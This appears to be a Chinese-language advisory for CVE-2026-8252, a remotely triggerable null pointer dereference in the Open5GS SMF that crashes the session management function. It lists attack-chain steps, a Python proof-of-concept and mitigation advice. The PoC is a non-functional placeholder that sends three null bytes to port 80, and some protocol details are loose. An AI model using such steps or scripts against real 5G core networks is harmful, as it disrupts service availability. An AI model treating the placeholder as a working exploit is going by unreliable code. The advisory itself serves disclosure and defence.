CVE-2026-8252 Open5GS 空指针解引用漏洞

漏洞信息

漏洞编号

CVE-2026-8252

漏洞类型

空指针解引用

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS 2.7.7及以下版本中存在安全漏洞。该漏洞位于会话管理功能（SMF）组件的`smf_nsmf_handle_create_data_in_hsmf`函数中。由于未对特定输入进行充分校验，攻击者可远程触发空指针解引用。尽管该漏洞利用方式已被公开披露，但官方尚未发布修复补丁，可能导致服务中断风险。

技术细节

该漏洞的根源在于Open5GS的SMF组件处理信令消息时的逻辑缺陷。具体而言，`smf_nsmf_handle_create_data_in_hsmf`函数在解析来自N1或N2接口的特定请求（如PDU会话建立请求）时，未能正确检查指针的有效性。攻击者通过网络（AV:N）发送构造恶意的数据包，利用低权限（PR:L）即可触发该函数访问空指针。由于无需用户交互（UI:N），攻击链较短。空指针解引用会导致SMF进程异常终止，从而影响5G核心网的会话管理功能，造成拒绝服务（DoS），影响系统可用性（A:L）。

攻击链分析

STEP 1

侦察

扫描网络识别Open5GS部署环境，定位SMF组件的接口地址。

STEP 2

访问

利用网络连通性，无需特殊用户交互，向SMF服务端口发起连接。

STEP 3

利用

发送特制的畸形信令数据包，触发`smf_nsmf_handle_create_data_in_hsmf`函数中的空指针解引用。

STEP 4

影响

导致SMF进程崩溃，中断PDU会话服务，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

# Conceptual PoC for CVE-2026-8252
# This script attempts to trigger a null pointer dereference in Open5GS SMF
# by sending a malformed packet to the relevant port (e.g., SCTP or HTTP/2 interface).
# Note: Actual packet structure depends on the specific protocol implementation.

target_ip = "192.168.1.100"  # Replace with target Open5GS SMF IP
target_port = 80             # Replace with actual management/SBI port

def craft_malformed_request():
    # In a real scenario, this would be a specific Diameter, GTP, or HTTP/2 message
    # missing a critical field expected by smf_nsmf_handle_create_data_in_hsmf
    # causing the parsing logic to dereference a NULL pointer.
    payload = b"\x00\x00\x00" # Placeholder for malformed header/body
    return payload

try:
    print(f"[*] Sending payload to {target_ip}:{target_port}...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, target_port))
    s.send(craft_malformed_request())
    s.close()
    print("[*] Payload sent. Check if SMF crashed.")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

由于官方尚未发布修复补丁，建议采取网络隔离措施，仅允许可信的网元（如AMF）与SMF通信。同时，建议密切监控Open5GS社区更新，并在测试环境中验证补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8252
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8252
3 Details https://www.cvedetails.com/cve/CVE-2026-8252/
4 VulDB https://vuldb.com/cve/CVE-2026-8252
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4446
7 Link https://vuldb.com/submit/808482
8 Link https://vuldb.com/vuln/362549
9 Link https://vuldb.com/vuln/362549/cti